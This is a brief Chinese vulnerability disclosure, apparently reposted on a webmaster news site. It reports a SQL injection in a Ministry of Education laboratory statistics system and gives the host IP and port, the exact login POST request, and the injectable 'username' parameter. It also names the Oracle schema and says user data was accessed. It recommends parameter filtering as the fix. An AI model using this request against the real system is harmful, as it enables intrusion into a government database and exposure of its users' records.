中华人民共和国教育部某站SQL注入漏洞下载

中华人民共和国教育部某站SQL注入漏洞原来以为是某大学的,看到数据觉得不是了。

http://202.4.130.200:81/ 高等学校实验室信息统计系统



版权为 版权所有 (C) 2005-2015 中华人民共和国教育部



POST /servlet/com.bluesoft.web.action.ActionServlet?action=com.bluesoft.app.login.LoginAction&method=ajaxValiate&ajax=1 HTTP/1.1

Host: 202.4.130.200:81



&username=admin&pwd=admin&validateCode=0108



username参数存在注入

current schema (equivalent to database on Oracle): 'RMS'

表信息,用户信息
 

查看部分数据证明为教育部的(原来以为是某大学的,看到数据就知道不是了)

修复方案:

参数过滤

上一篇: [公开漏洞]优酷网sql注射+各种敏感信息泄漏
下一篇: 华为IPTV运维不当导致系统重要敏感信息泄漏下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细